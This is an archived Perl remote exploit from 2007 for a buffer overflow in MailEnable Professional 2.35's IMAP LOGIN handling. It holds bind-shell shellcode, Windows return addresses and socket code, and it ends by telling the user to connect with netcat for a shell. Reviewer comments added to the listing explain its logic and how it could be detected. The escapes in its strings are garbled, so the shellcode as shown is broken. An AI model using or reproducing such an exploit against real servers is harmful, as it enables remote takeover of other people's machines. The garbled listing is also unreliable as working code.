
# Title : MailEnable Professional 2.35 Remote Buffer Overflow Exploit
# Published : 2007-02-16
# Author : mu-b


#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional <=v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing is quite critical with this!!, so change $send_delay
#       if it doesn't work....
#
########

# NOTE(review): the file never enables `use strict` / `use warnings`; every
# identifier below that is not declared with `my` (%arg, $buf, and the
# variables assigned inside connect_host) is therefore a package global.
# The text also appears garbled in this archived copy (see the "n" / "rn"
# string endings and the getopts() argument), so the listing reads as a
# historical record of the technique rather than as something that runs as
# the author intended.
use Getopt::Std; getopts('t:n:', %arg);
use Socket;

# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "x33xc9x83xe9xb0".
  "x81xc4xd0xfdxffxff".
  "xd9xeexd9x74x24xf4x5bx81x73x13x1d".
  "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
  "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
  "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
  "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
  "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
  "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
  "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
  "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
  "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
  "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
  "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
  "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
  "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
  "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
  "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
  "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
  "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
  "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
  "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
  "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
  "x4ex33xe4x96xcdxccx32x69";

# ff e4 -> jmp %esp
# Each entry is a fixed return address tied to one exact KERNEL32.dll build
# (per the trailing comments), which is why the author notes the exploit is
# fragile; the last entry is labelled DoS by the author and is not tied to
# any build.
my @offsets = ( "xf8xfex5ax7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
                "xe2x48xe6x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
                "x06x38xe6x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
                "xd9xaex80x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
                "x62x51xebx77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
                "xefxbexadxde"  # DoS
              );

# `&name;` passes the caller's current @_ through to the sub; harmless here
# (the sub ignores its arguments), but `print_header();` is the usual form.
&print_header;

my $target;
my $offset;

# -t is required; -n selects a row of @offsets and defaults to 0. The bounds
# check only rejects values past the end of the list: a non-numeric -n
# becomes 0, and a negative -n is accepted and indexes from the end.
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
    print("only ".($#offsets+1)." targets known!!n");
    exit(1);
} else {
    $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 1;

my $NOP = 'A';
my $START_PAD = 547;
my $SHELL_PAD = 12;

# connect_host() either dies or returns a true value, so this branch is
# always taken once the connection is up. The script never reads a server
# response; it paces the exchange with fixed sleeps only, which is what the
# header comment about timing refers to.
#
# Detection note: on the wire this is an IMAP LOGIN with a literal-size
# prefix, two short continuation lines, and then a single 0x3ff-byte
# buffer (padding + return address + payload) sent with no CRLF terminator.
# An IMAP server log or IDS rule keyed on oversized LOGIN literals would
# see this sequence.
if (connect_host($target, $imapd_port)) {
    print("-> * Connectedn");
    $buf = "A001 LOGIN {24}";
    send(SOCKET, $buf."rn", 0);
    sleep($send_delay);

    print("-> * Sending payloadn");

    send(SOCKET, "AAAAAAAAAAAAAAAAA{20}rn", 0);
    sleep($send_delay);

    send(SOCKET, "BBBBBBBBBBBBBBBBBBrn", 0);
    sleep($send_delay);

    # Total length is fixed at 0x3ff bytes: the trailing padding is sized to
    # whatever the other pieces leave over.
    $buf = ($NOP x $START_PAD).# padding
           $offset.            # EIP
           ($NOP x $SHELL_PAD).
           $zshell_win32_bind. # shellcode
           ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
    send(SOCKET, $buf, 0);

    # SOCKET is never closed; it is left open until the process exits.
    print("-> * Successfully sent payload!n");
    print("-> * nc ".$target." 1337 for shell...n");
}

# Prints the banner to STDOUT. Takes no arguments and returns the value of
# the last print (ignored by the caller).
sub print_header {
    print("MailEnable Pro <=v2.35 remote exploitn");
    print("by: <mu-b@digit-labs.org>nn");
}

# Prints the command-line usage text and terminates the process with exit
# status 1; never returns. Called only when -t was not supplied.
sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
     -n <num>         : return addy offset number
));

    exit(1);
}

# Opens a TCP connection to ($target, $port) on the bareword package
# filehandle SOCKET, which the caller then uses directly.
#
# Every step dies on failure, so the sub never returns false; the caller's
# truth test on the return value is therefore redundant. 1338 is an
# arbitrary true value, nothing reads it as a number.
#
# NOTE(review): $port, $iaddr, $paddr and $proto are not declared with `my`
# and so are package globals; $target rebinds the file-scope lexical of the
# same name. The `|| die` chains are correct here because assignment binds
# more loosely than `||`.
sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!n");
    $proto  = getprotobyname('tcp')              || die("Error: $!n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!n");
    connect(SOCKET, $paddr)                      || die("Error: $!n");
    return(1338);
}
